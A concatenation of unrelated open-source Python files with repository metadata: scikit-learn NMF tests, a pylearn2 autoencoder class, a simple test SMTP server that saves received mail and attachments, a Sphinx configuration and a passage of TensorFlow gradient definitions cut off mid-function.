H_init = np.abs(avg * random_state.randn(n_components, 5))
W_init = np.abs(avg * random_state.randn(6, n_components))
m = NMF(solver='cd', n_components=n_components, init='custom',
random_state=0)
m.fit_transform(A, W=W_init, H=H_init)
m.transform(A)
@pytest.mark.parametrize('solver', ('cd', 'mu'))
@pytest.mark.parametrize('regularization',
(None, 'both', 'components', 'transformation'))
def test_nmf_inverse_transform(solver, regularization):
# Test that NMF.inverse_transform returns close values
random_state = np.random.RandomState(0)
A = np.abs(random_state.randn(6, 4))
m = NMF(solver=solver, n_components=4, init='random', random_state=0,
regularization=regularization, max_iter=1000)
ft = m.fit_transform(A)
A_new = m.inverse_transform(ft)
assert_array_almost_equal(A, A_new, decimal=2)
def test_n_components_greater_n_features():
# Smoke test for the case of more components than features.
rng = np.random.mtrand.RandomState(42)
A = np.abs(rng.randn(30, 10))
# FIXME : should be removed in 0.26
init = 'random'
NMF(n_components=15, random_state=0, tol=1e-2, init=init).fit(A)
@pytest.mark.parametrize('solver', ['cd', 'mu'])
@pytest.mark.parametrize('regularization',
[None, 'both', 'components', 'transformation'])
def test_nmf_sparse_input(solver, regularization):
# Test that sparse matrices are accepted as input
from scipy.sparse import csc_matrix
rng = np.random.mtrand.RandomState(42)
A = np.abs(rng.randn(10, 10))
A[:, 2 * np.arange(5)] = 0
A_sparse = csc_matrix(A)
est1 = NMF(solver=solver, n_components=5, init='random',
regularization=regularization, random_state=0,
tol=1e-2)
est2 = clone(est1)
W1 = est1.fit_transform(A)
W2 = est2.fit_transform(A_sparse)
H1 = est1.components_
H2 = est2.components_
assert_array_almost_equal(W1, W2)
assert_array_almost_equal(H1, H2)
def test_nmf_sparse_transform():
# Test that transform works on sparse data. Issue #2124
rng = np.random.mtrand.RandomState(42)
A = np.abs(rng.randn(3, 2))
A[1, 1] = 0
A = csc_matrix(A)
for solver in ('cd', 'mu'):
model = NMF(solver=solver, random_state=0, n_components=2,
max_iter=400, init='nndsvd')
A_fit_tr = model.fit_transform(A)
A_tr = model.transform(A)
assert_array_almost_equal(A_fit_tr, A_tr, decimal=1)
@pytest.mark.parametrize('init', ['random', 'nndsvd'])
@pytest.mark.parametrize('solver', ('cd', 'mu'))
@pytest.mark.parametrize('regularization',
(None, 'both', 'components', 'transformation'))
def test_non_negative_factorization_consistency(init, solver, regularization):
# Test that the function is called in the same way, either directly
# or through the NMF class
rng = np.random.mtrand.RandomState(42)
A = np.abs(rng.randn(10, 10))
A[:, 2 * np.arange(5)] = 0
W_nmf, H, _ = non_negative_factorization(
A, init=init, solver=solver,
regularization=regularization, random_state=1, tol=1e-2)
W_nmf_2, _, _ = non_negative_factorization(
A, H=H, update_H=False, init=init, solver=solver,
regularization=regularization, random_state=1, tol=1e-2)
model_class = NMF(init=init, solver=solver,
regularization=regularization,
random_state=1, tol=1e-2)
W_cls = model_class.fit_transform(A)
W_cls_2 = model_class.transform(A)
assert_array_almost_equal(W_nmf, W_cls, decimal=10)
assert_array_almost_equal(W_nmf_2, W_cls_2, decimal=10)
def test_non_negative_factorization_checking():
A = np.ones((2, 2))
# Test parameters checking is public function
nnmf = non_negative_factorization
msg = ("Number of components must be a positive integer; "
"got (n_components=1.5)")
assert_raise_message(ValueError, msg, nnmf, A, A, A, 1.5, init='random')
msg = ("Number of components must be a positive integer; "
"got (n_components='2')")
assert_raise_message(ValueError, msg, nnmf, A, A, A, '2', init='random')
msg = "Negative values in data passed to NMF (input H)"
assert_raise_message(ValueError, msg, nnmf, A, A, -A, 2, init='custom')
msg = "Negative values in data passed to NMF (input W)"
assert_raise_message(ValueError, msg, nnmf, A, -A, A, 2, init='custom')
msg = "Array passed to NMF (input H) is full of zeros"
assert_raise_message(ValueError, msg, nnmf, A, A, 0 * A, 2, init='custom')
msg = "Invalid regularization parameter: got 'spam' instead of one of"
assert_raise_message(ValueError, msg, nnmf, A, A, 0 * A, 2, init='custom',
regularization='spam')
def _beta_divergence_dense(X, W, H, beta):
"""Compute the beta-divergence of X and W.H for dense array only.
Used as a reference for testing nmf._beta_divergence.
"""
WH = np.dot(W, H)
if beta == 2:
return squared_norm(X - WH) / 2
WH_Xnonzero = WH[X != 0]
X_nonzero = X[X != 0]
np.maximum(WH_Xnonzero, 1e-9, out=WH_Xnonzero)
if beta == 1:
res = np.sum(X_nonzero * np.log(X_nonzero / WH_Xnonzero))
res += WH.sum() - X.sum()
elif beta == 0:
div = X_nonzero / WH_Xnonzero
res = np.sum(div) - X.size - np.sum(np.log(div))
else:
res = (X_nonzero ** beta).sum()
res += (beta - 1) * (WH ** beta).sum()
res -= beta * (X_nonzero * (WH_Xnonzero ** (beta - 1))).sum()
res /= beta * (beta - 1)
return res
def test_beta_divergence():
# Compare _beta_divergence with the reference _beta_divergence_dense
n_samples = 20
n_features = 10
n_components = 5
beta_losses = [0., 0.5, 1., 1.5, 2.]
# initialization
rng = np.random.mtrand.RandomState(42)
X = rng.randn(n_samples, n_features)
np.clip(X, 0, None, out=X)
X_csr = sp.csr_matrix(X)
W, H = nmf._initialize_nmf(X, n_components, init='random', random_state=42)
for beta in beta_losses:
ref = _beta_divergence_dense(X, W, H, beta)
loss = nmf._beta_divergence(X, W, H, beta)
loss_csr = nmf._beta_divergence(X_csr, W, H, beta)
assert_almost_equal(ref, loss, decimal=7)
assert_almost_equal(ref, loss_csr, decimal=7)
def test_special_sparse_dot():
# Test the function that computes np.dot(W, H), only where X is non zero.
n_samples = 10
n_features = 5
n_components = 3
rng = np.random.mtrand.RandomState(42)
X = rng.randn(n_samples, n_features)
np.clip(X, 0, None, out=X)
X_csr = sp.csr_matrix(X)
W = np.abs(rng.randn(n_samples, n_components))
H = np.abs(rng.randn(n_components, n_features))
WH_safe = nmf._special_sparse_dot(W, H, X_csr)
WH = nmf._special_sparse_dot(W, H, X)
# test that both results have same values, in X_csr nonzero elements
ii, jj = X_csr.nonzero()
WH_safe_data = np.asarray(WH_safe[ii, jj]).ravel()
assert_array_almost_equal(WH_safe_data, WH[ii, jj], decimal=10)
# test that WH_safe and X_csr have the same sparse structure
assert_array_equal(WH_safe.indices, X_csr.indices)
assert_array_equal(WH_safe.indptr, X_csr.indptr)
assert_array_equal(WH_safe.shape, X_csr.shape)
@ignore_warnings(category=ConvergenceWarning)
def test_nmf_multiplicative_update_sparse():
# Compare sparse and dense input in multiplicative update NMF
# Also test continuity of the results with respect to beta_loss parameter
n_samples = 20
n_features = 10
n_components = 5
alpha = 0.1
l1_ratio = 0.5
n_iter = 20
# initialization
rng = np.random.mtrand.RandomState(1337)
X = rng.randn(n_samples, n_features)
X = np.abs(X)
X_csr = sp.csr_matrix(X)
W0, H0 = nmf._initialize_nmf(X, n_components, init='random',
random_state=42)
for beta_loss in (-1.2, 0, 0.2, 1., 2., 2.5):
# Reference with dense array X
W, H = W0.copy(), H0.copy()
W1, H1, _ = non_negative_factorization(
X, W, H, n_components, init='custom', update_H=True,
solver='mu', beta_loss=beta_loss, max_iter=n_iter, alpha=alpha,
l1_ratio=l1_ratio, regularization='both', random_state=42)
# Compare with sparse X
W, H = W0.copy(), H0.copy()
W2, H2, _ = non_negative_factorization(
X_csr, W, H, n_components, init='custom', update_H=True,
solver='mu', beta_loss=beta_loss, max_iter=n_iter, alpha=alpha,
l1_ratio=l1_ratio, regularization='both', random_state=42)
assert_array_almost_equal(W1, W2, decimal=7)
assert_array_almost_equal(H1, H2, decimal=7)
# Compare with almost same beta_loss, since some values have a specific
# behavior, but the results should be continuous w.r.t beta_loss
beta_loss -= 1.e-5
W, H = W0.copy(), H0.copy()
W3, H3, _ = non_negative_factorization(
X_csr, W, H, n_components, init='custom', update_H=True,
solver='mu', beta_loss=beta_loss, max_iter=n_iter, alpha=alpha,
l1_ratio=l1_ratio, regularization='both', random_state=42)
assert_array_almost_equal(W1, W3, decimal=4)
assert_array_almost_equal(H1, H3, decimal=4)
def test_nmf_negative_beta_loss():
# Test that an error is raised if beta_loss < 0 and X contains zeros.
# Test that the output has not NaN values when the input contains zeros.
n_samples = 6
n_features = 5
n_components = 3
rng = np.random.mtrand.RandomState(42)
X = rng.randn(n_samples, n_features)
np.clip(X, 0, None, out=X)
X_csr = sp.csr_matrix(X)
def _assert_nmf_no_nan(X, beta_loss):
W, H, _ = non_negative_factorization(
X, init='random', n_components=n_components, solver='mu',
beta_loss=beta_loss, random_state=0, max_iter=1000)
assert not np.any(np.isnan(W))
assert not np.any(np.isnan(H))
msg = "When beta_loss <= 0 and X contains zeros, the solver may diverge."
for beta_loss in (-0.6, 0.):
assert_raise_message(ValueError, msg, _assert_nmf_no_nan, X, beta_loss)
_assert_nmf_no_nan(X + 1e-9, beta_loss)
for beta_loss in (0.2, 1., 1.2, 2., 2.5):
_assert_nmf_no_nan(X, beta_loss)
_assert_nmf_no_nan(X_csr, beta_loss)
def test_nmf_regularization():
# Test the effect of L1 and L2 regularizations
n_samples = 6
n_features = 5
n_components = 3
rng = np.random.mtrand.RandomState(42)
X = np.abs(rng.randn(n_samples, n_features))
# FIXME : should be removed in 0.26
init = 'nndsvda'
# L1 regularization should increase the number of zeros
l1_ratio = 1.
for solver in ['cd', 'mu']:
regul = nmf.NMF(n_components=n_components, solver=solver,
alpha=0.5, l1_ratio=l1_ratio, random_state=42,
init=init)
model = nmf.NMF(n_components=n_components, solver=solver,
alpha=0., l1_ratio=l1_ratio, random_state=42,
init=init)
W_regul = regul.fit_transform(X)
W_model = model.fit_transform(X)
H_regul = regul.components_
H_model = model.components_
W_regul_n_zeros = W_regul[W_regul == 0].size
W_model_n_zeros = W_model[W_model == 0].size
H_regul_n_zeros = H_regul[H_regul == 0].size
H_model_n_zeros = H_model[H_model == 0].size
assert W_regul_n_zeros > W_model_n_zeros
assert H_regul_n_zeros > H_model_n_zeros
# L2 regularization should decrease the mean of the coefficients
l1_ratio = 0.
for solver in ['cd', 'mu']:
regul = nmf.NMF(n_components=n_components, solver=solver,
alpha=0.5, l1_ratio=l1_ratio, random_state=42,
init=init)
model = nmf.NMF(n_components=n_components, solver=solver,
alpha=0., l1_ratio=l1_ratio, random_state=42,
init=init)
W_regul = regul.fit_transform(X)
W_model = model.fit_transform(X)
H_regul = regul.components_
H_model = model.components_
assert (linalg.norm(W_model))**2. + (linalg.norm(H_model))**2. > \
(linalg.norm(W_regul))**2. + (linalg.norm(H_regul))**2.
@ignore_warnings(category=ConvergenceWarning)
def test_nmf_decreasing():
# test that the objective function is decreasing at each iteration
n_samples = 20
n_features = 15
n_components = 10
alpha = 0.1
l1_ratio = 0.5
tol = 0.
# initialization
rng = np.random.mtrand.RandomState(42)
X = rng.randn(n_samples, n_features)
np.abs(X, X)
W0, H0 = nmf._initialize_nmf(X, n_components, init='random',
random_state=42)
for beta_loss in (-1.2, 0, 0.2, 1., 2., 2.5):
for solver in ('cd', 'mu'):
if solver != 'mu' and beta_loss != 2:
# not implemented
continue
W, H = W0.copy(), H0.copy()
previous_loss = None
for _ in range(30):
# one more iteration starting from the previous results
W, H, _ = non_negative_factorization(
X, W, H, beta_loss=beta_loss, init='custom',
n_components=n_components, max_iter=1, alpha=alpha,
solver=solver, tol=tol, l1_ratio=l1_ratio, verbose=0,
regularization='both', random_state=0, update_H=True)
loss = nmf._beta_divergence(X, W, H, beta_loss)
if previous_loss is not None:
assert previous_loss > loss
previous_loss = loss
def test_nmf_underflow():
# Regression test for an underflow issue in _beta_divergence
rng = np.random.RandomState(0)
n_samples, n_features, n_components = 10, 2, 2
X = np.abs(rng.randn(n_samples, n_features)) * 10
W = np.abs(rng.randn(n_samples, n_components)) * 10
H = np.abs(rng.randn(n_components, n_features))
X[0, 0] = 0
ref = nmf._beta_divergence(X, W, H, beta=1.0)
X[0, 0] = 1e-323
res = nmf._beta_divergence(X, W, H, beta=1.0)
assert_almost_equal(res, ref)
@pytest.mark.parametrize("dtype_in, dtype_out", [
(np.float32, np.float32),
(np.float64, np.float64),
(np.int32, np.float64),
(np.int64, np.float64)])
@pytest.mark.parametrize("solver", ["cd", "mu"])
@pytest.mark.parametrize("regularization",
(None, "both", "components", "transformation"))
def test_nmf_dtype_match(dtype_in, dtype_out, solver, regularization):
# Check that NMF preserves dtype (float32 and float64)
X = np.random.RandomState(0).randn(20, 15).astype(dtype_in, copy=False)
np.abs(X, out=X)
# FIXME : should be removed in 0.26
init = 'nndsvda'
nmf = NMF(solver=solver, regularization=regularization, init=init)
assert nmf.fit(X).transform(X).dtype == dtype_out
assert nmf.fit_transform(X).dtype == dtype_out
assert nmf.components_.dtype == dtype_out
@pytest.mark.parametrize("solver", ["cd", "mu"])
@pytest.mark.parametrize("regularization",
(None, "both", "components", "transformation"))
def test_nmf_float32_float64_consistency(solver, regularization):
# Check that the result of NMF is the same between float32 and float64
X = np.random.RandomState(0).randn(50, 7)
np.abs(X, out=X)
# FIXME : should be removed in 0.26
init = 'nndsvda'
nmf32 = NMF(solver=solver, regularization=regularization, random_state=0,
init=init)
W32 = nmf32.fit_transform(X.astype(np.float32))
nmf64 = NMF(solver=solver, regularization=regularization, random_state=0,
init=init)
W64 = nmf64.fit_transform(X)
assert_allclose(W32, W64, rtol=1e-6, atol=1e-5)
def test_nmf_custom_init_dtype_error():
# Check that an error is raise if custom H and/or W don't have the same
# dtype as X.
rng = np.random.RandomState(0)
X = rng.random_sample((20, 15))
H = rng.random_sample((15, 15)).astype(np.float32)
W = rng.random_sample((20, 15))
with pytest.raises(TypeError, match="should have the same dtype as X"):
NMF(init='custom').fit(X, H=H, W=W)
with pytest.raises(TypeError, match="should have the same dtype as X"):
non_negative_factorization(X, H=H, update_H=False)
# FIXME : should be removed in 0.26
def test_init_default_deprecation():
# Test FutureWarning on init default
msg = ("The 'init' value, when 'init=None' and "
"n_components is less than n_samples and "
"n_features, will be changed from 'nndsvd' to "
"'nndsvda' in 0.26.")
rng = np.random.mtrand.RandomState(42)
A = np.abs(rng.randn(6, 5))
with pytest.warns(FutureWarning, match=msg):
nmf._initialize_nmf(A, 3)
with pytest.warns(FutureWarning, match=msg):
NMF().fit(A)
with pytest.warns(FutureWarning, match=msg):
non_negative_factorization(A)
| {
"content_hash": "5576bd4710596de859258b1251aee62c",
"timestamp": "",
"source": "github",
"line_count": 612,
"max_line_length": 79,
"avg_line_length": 38.78921568627451,
"alnum_prop": 0.6166645604279877,
"repo_name": "ndingwall/scikit-learn",
"id": "ff6b4ed8b4245fcd7ff5ab2aa73893ac708a4510",
"size": "23739",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sklearn/decomposition/tests/test_nmf.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "416843"
},
{
"name": "C++",
"bytes": "140261"
},
{
"name": "Makefile",
"bytes": "1630"
},
{
"name": "PowerShell",
"bytes": "17042"
},
{
"name": "Python",
"bytes": "6794973"
},
{
"name": "Shell",
"bytes": "13442"
}
],
"symlink_target": ""
} |
from pylearn2.models.mlp import MLP
class Autoencoder(MLP):
"""
An MLP whose output domain is the same as its input domain.
"""
def get_target_source(self):
return 'features'
| {
"content_hash": "70c88d6c37f247c25cb1aa511ae9e9de",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 63,
"avg_line_length": 20.2,
"alnum_prop": 0.6534653465346535,
"repo_name": "xinmei9322/theano_exercises",
"id": "f0be958d77c0f5f89557471c84e7514c47d336b7",
"size": "202",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "04_machine_learning/02_autoencoder/autoencoder.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "38801"
}
],
"symlink_target": ""
} |
import smtpd
import asyncore
import os
import email
def parsemail(mail, savename):
prefix = savename
mails = []
names = []
def parsesingle(mail):
if mail.is_multipart():
for m in mail.get_payload():
parsesingle(m)
return
name = mail.get_param("name")
if name:
# attachment
name = email.Header.decode_header(email.Header.Header(name))[0][0]
charset = mail.get_content_charset()
contenttype = mail.get_content_type()
data = mail.get_payload(decode=True)
if charset and contenttype and contenttype.upper().startswith('TEXT'):
data = unicode(data, str(charset), "ignore").encode('utf8', 'replace')
if name:
# save attachment
names.append(name)
attindex = len(names)
try:
f = open(u'%s.atach.%d.%s'%(prefix, attindex, name), 'wb')
except:
f = open('%s.atach.%d'%(prefix, attindex), 'wb')
f.write(data)
f.close()
else:
mails.append(data)
parsesingle(mail)
mailtext = '\r\n\r\n'.join(mails)
with open(savename, 'wb') as f:
f.write(mailtext)
return mailtext
class MainSMTPServer(smtpd.SMTPServer):
__version__ = 'TEST EMAIL SERVER'
def process_message(self, peer, mailfrom, rcpttos, data):
import time
d = os.path.join(os.getcwd(), 'inbox')
try:
os.makedirs(d)
except:
pass
ts = time.strftime('%Y%m%d%H%M%S')
mail = email.message_from_string(data)
mailtext = parsemail(mail, os.path.join(d, '%s.txt'%ts))
for t in rcpttos:
fn = os.path.join(d, '%s-%s'%(ts, t))
print fn
with open(fn,'wb') as f:
f.write(data)
kf = '%-15s'
print time.strftime('%Y-%m-%d %H:%M:%S')
print kf%'Client',':', '%s:%s'%peer
print kf%'Mail From',':', mailfrom
print kf%'Mail To',':', rcpttos
print kf%'Mail Lenth',':', len(data)
print mailtext
return
if __name__ == "__main__":
addr = ('0.0.0.0', 25)
smtp_server = MainSMTPServer(addr, None)
print 'mail server @ %s:%s'%addr
try:
asyncore.loop()
except KeyboardInterrupt:
smtp_server.close() | {
"content_hash": "e7df0d09dbf8848eb534922f82ea8315",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 82,
"avg_line_length": 30.961038961038962,
"alnum_prop": 0.5239093959731543,
"repo_name": "sintrb/SinMail",
"id": "61db05d58f6ceef96bad6959cd3f14f8650f6482",
"size": "2384",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/MainSMTPServer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2900"
}
],
"symlink_target": ""
} |
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'oslosphinx'
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'neutron-classifier'
copyright = u'2013, OpenStack Foundation'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
| {
"content_hash": "73e6582268f79492a99d8c0e3a8b7ef3",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 79,
"avg_line_length": 31.081967213114755,
"alnum_prop": 0.6735232067510548,
"repo_name": "sc68cal/neutron-classifier",
"id": "ab238962a3309c111762f03bb8525364a4a0f866",
"size": "2466",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/source/conf.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "11921"
}
],
"symlink_target": ""
} |
"""Gradients for operators defined in math_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.client import pywrap_tf_session as c_api
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import special_math_ops
def _safe_shape_div(x, y):
"""Divides `x / y` assuming `x, y >= 0`, treating `0 / 0 = 0`."""
return x // math_ops.maximum(y, 1)
@ops.RegisterGradient("ArgMax")
def _ArgMaxGrad(op, grad):
del op, grad
return [None, None]
@ops.RegisterGradient("ArgMin")
def _ArgMinGrad(op, grad):
del op, grad
return [None, None]
@ops.RegisterGradient("EuclideanNorm")
def _EuclideanNormGrad(op, grad):
"""Gradient for EuclideanNorm."""
output = op.outputs[0]
if not op.get_attr("keep_dims"):
output_shape_kept_dims = math_ops.reduced_shape(
array_ops.shape(op.inputs[0]), op.inputs[1])
output = array_ops.reshape(output, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
return math_ops.truediv(op.inputs[0], output / grad), None
def SmartBroadcastGradientArgs(x, y, grad):
"""Optimized version of `broadcast_gradient_args` that caches results.
This implementation avoids creating `broadcast_gradient_args` ops in the case
that the input shapes are fully defined, and provides hints to the calling
code that can be used to avoid creating reduction and reshaping ops.
Args:
x: The left input tensor to a broadcasting binary op.
y: The right input tensor to a broadcasting binary op.
grad: The incoming gradient tensor for a broadcasting binary op.
Returns:
A pair of tuples, containing:
* A 3-tuple of broadcast information for x, containing:
* The shape of x (as a tuple or Tensor).
* The reduction indices for x (as a tuple or Tensor).
* A boolean, which if True, indicates that x's shape differs from grad's
shape (and so x's gradient must be reduced and/or reshaped).
* A 3-tuple of broadcast information for y, containing the respective
details for y.
"""
# NOTE: It may be productive to apply these optimizations in the eager case
# as well.
if context.executing_eagerly() or not (
isinstance(x, ops.Tensor) and isinstance(y, ops.Tensor)
and isinstance(grad, ops.Tensor)):
sx = array_ops.shape(x)
sy = array_ops.shape(y)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
return (sx, rx, True), (sy, ry, True)
# pylint: disable=protected-access
x_shape_tuple = x._shape_tuple()
y_shape_tuple = y._shape_tuple()
grad_shape_tuple = grad._shape_tuple()
# pylint: enable=protected-access
if (x_shape_tuple is None or None in x_shape_tuple or
y_shape_tuple is None or None in y_shape_tuple):
sx = array_ops.shape_internal(x, optimize=False)
sy = array_ops.shape_internal(y, optimize=False)
rx, ry = gen_array_ops.broadcast_gradient_args(sx, sy)
return (sx, rx, True), (sy, ry, True)
x_needs_reduction = x_shape_tuple != grad_shape_tuple
y_needs_reduction = y_shape_tuple != grad_shape_tuple
# Get the default graph rather than relying on `x.graph`, `y.graph`, or
# `grad.graph`, because these may be eager tensors.
g = ops.get_default_graph()
try:
rx, ry = g._bcast_grad_args_cache[(x_shape_tuple, y_shape_tuple)] # pylint: disable=protected-access
return (x_shape_tuple, rx, x_needs_reduction), (
y_shape_tuple, ry, y_needs_reduction)
except KeyError:
rx, ry = array_ops.broadcast_gradient_args(x_shape_tuple, y_shape_tuple)
# TODO(mrry): If this becomes a bottleneck, add a multi-output version of
# `TF_TryEvaluateConstant()`.
rx_value = tuple(c_api.TF_TryEvaluateConstant_wrapper(
rx.graph._c_graph, rx._as_tf_output())) # pylint: disable=protected-access
assert rx_value is not None
ry_value = tuple(c_api.TF_TryEvaluateConstant_wrapper(
ry.graph._c_graph, ry._as_tf_output())) # pylint: disable=protected-access
assert ry_value is not None
g._bcast_grad_args_cache[(x_shape_tuple, y_shape_tuple)] = ( # pylint: disable=protected-access
rx_value, ry_value)
return (x_shape_tuple, rx_value, x_needs_reduction), (
y_shape_tuple, ry_value, y_needs_reduction)
_empty_tuple = ()
def _IsScalar(x):
return x._shape_tuple() is _empty_tuple # pylint: disable=protected-access
@ops.RegisterGradient("Sum")
def _SumGrad(op, grad):
"""Gradient for Sum."""
# Fast path for when reducing to a scalar and ndims is known: adds only
# Reshape and Tile ops (and possibly a Shape).
input_0_shape = op.inputs[0]._shape_tuple() # pylint: disable=protected-access
if input_0_shape is not None:
axes = tensor_util.constant_value(op.inputs[1])
if axes is not None:
rank = len(input_0_shape)
if np.array_equal(axes, np.arange(rank)): # Reduce all dims.
if context.executing_eagerly():
ctx = context.context()
new_shape = ctx.ones_rank_cache().get(rank)
if new_shape is None:
new_shape = constant_op.constant([1] * rank, dtype=dtypes.int32)
ctx.ones_rank_cache().put(rank, new_shape)
else:
new_shape = [1] * rank
grad = array_ops.reshape(grad, new_shape)
# If shape is not fully defined (but rank is), we use Shape.
if None not in input_0_shape:
input_shape = constant_op.constant(input_0_shape, dtype=dtypes.int32)
else:
input_shape = array_ops.shape(op.inputs[0])
return [array_ops.tile(grad, input_shape), None]
elif None not in input_0_shape and not context.executing_eagerly():
# The shape and reduction indices are statically known, so we use a
# graph-level cache to avoid recomputing `reduced_shape()` for each
# invocation.
graph = ops.get_default_graph()
# Canonicalize `axes` to be a tuple of indices. The incoming
# value may be a scalar or a vector, and may include negative indices.
axes = tuple(axes.reshape(-1))
try:
output_shape_kept_dims, tile_scaling = graph._reduced_shape_cache[ # pylint: disable=protected-access
(input_0_shape, axes)]
except KeyError:
# Compute and cache `output_shape_kept_dims` and `tile_scaling`.
def EvaluateAsTuple(t):
if tensor_util.is_tf_type(t):
value = c_api.TF_TryEvaluateConstant_wrapper(
t.graph._c_graph, t._as_tf_output()) # pylint: disable=protected-access
assert value is not None
else:
value = t
return tuple(value)
output_shape_kept_dims = EvaluateAsTuple(
math_ops.reduced_shape(input_0_shape, axes))
tile_scaling = EvaluateAsTuple(
_safe_shape_div(input_0_shape, output_shape_kept_dims))
graph._reduced_shape_cache[(input_0_shape, axes)] = ( # pylint:disable=protected-access
output_shape_kept_dims, tile_scaling)
grad = array_ops.reshape(grad, output_shape_kept_dims)
return [array_ops.tile(grad, tile_scaling), None]
input_shape = array_ops.shape(op.inputs[0])
if not op.get_attr("keep_dims"):
with ops.colocate_with(input_shape):
# TODO(apassos) remove this once device placement for eager ops makes
# more sense.
output_shape_kept_dims = math_ops.reduced_shape(input_shape,
op.inputs[1])
grad = array_ops.reshape(grad, output_shape_kept_dims)
return [array_ops.broadcast_to(grad, input_shape), None]
def _MinOrMaxGrad(op, grad):
"""Gradient for Min or Max. Amazingly it's precisely the same code."""
input_shape = array_ops.shape(op.inputs[0])
y = op.outputs[0]
if not op.get_attr("keep_dims"):
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
y = array_ops.reshape(y, output_shape_kept_dims)
grad = array_ops.reshape(grad, output_shape_kept_dims)
else:
output_shape_kept_dims = array_ops.shape(y)
# Compute the number of selected (maximum or minimum) elements in each
# reduction dimension. If there are multiple minimum or maximum elements
# then the gradient will be divided between them.
indicators = math_ops.cast(math_ops.equal(y, op.inputs[0]), grad.dtype)
num_selected = array_ops.reshape(
math_ops.reduce_sum(indicators, op.inputs[1]), output_shape_kept_dims)
return [math_ops.divide(indicators, num_selected) * grad, None]
@ops.RegisterGradient("Max")
def _MaxGrad(op, grad):
"""Gradient for Max."""
return _MinOrMaxGrad(op, grad)
@ops.RegisterGradient("Min")
def _MinGrad(op, grad):
return _MinOrMaxGrad(op, grad)
@ops.RegisterGradient("Mean")
def _MeanGrad(op, grad):
"""Gradient for Mean."""
sum_grad = _SumGrad(op, grad)[0]
input_shape = op.inputs[0]._shape_tuple() # pylint: disable=protected-access
output_shape = op.outputs[0]._shape_tuple() # pylint: disable=protected-access
if (input_shape is not None and output_shape is not None and
None not in input_shape and None not in output_shape):
input_size = np.prod(input_shape)
output_size = np.prod(output_shape)
factor = input_size // max(output_size, 1)
factor = constant_op.constant(factor, dtype=sum_grad.dtype)
else:
input_shape = array_ops.shape(op.inputs[0])
output_shape = array_ops.shape(op.outputs[0])
factor = _safe_shape_div(
math_ops.reduce_prod(input_shape), math_ops.reduce_prod(output_shape))
return math_ops.truediv(sum_grad, math_ops.cast(factor, sum_grad.dtype)), None
@ops.RegisterGradient("Prod")
def _ProdGrad(op, grad):
"""Gradient for Prod."""
# The gradient can be expressed by dividing the product by each entry of the
# input tensor, but this approach can't deal with zeros in the input.
# Here, we avoid this problem by composing the output as a product of two
# cumprod operations.
input_shape = array_ops.shape(op.inputs[0])
# Reshape reduction indices for the case where the parameter is a scalar
reduction_indices = array_ops.reshape(op.inputs[1], [-1])
# Expand grad to full input shape
if not op.get_attr("keep_dims"):
output_shape_kept_dims = math_ops.reduced_shape(input_shape, op.inputs[1])
grad = array_ops.reshape(grad, output_shape_kept_dims)
grad = array_ops.broadcast_to(grad, input_shape)
# Pack all reduced dimensions into a single one, so we can perform the
# cumprod ops. If the reduction dims list is empty, it defaults to float32,
# so we need to cast here. We put all the shape-related ops on CPU to avoid
# copying back and forth, and since listdiff is CPU only.
with ops.device("/cpu:0"):
rank = array_ops.rank(op.inputs[0])
reduction_indices = (reduction_indices + rank) % rank
reduced = math_ops.cast(reduction_indices, dtypes.int32)
idx = math_ops.range(0, rank)
other, _ = gen_array_ops.list_diff(idx, reduced, dtypes.int32)
perm = array_ops.concat([reduced, other], 0)
reduced_num = math_ops.reduce_prod(array_ops.gather(input_shape, reduced))
other_num = math_ops.reduce_prod(array_ops.gather(input_shape, other))
permuted = array_ops.transpose(op.inputs[0], perm)
permuted_shape = array_ops.shape(permuted)
reshaped = array_ops.reshape(permuted, (reduced_num, other_num))
# Calculate product, leaving out the current entry
left = math_ops.cumprod(reshaped, axis=0, exclusive=True)
right = math_ops.cumprod(reshaped, axis=0, exclusive=True, reverse=True)
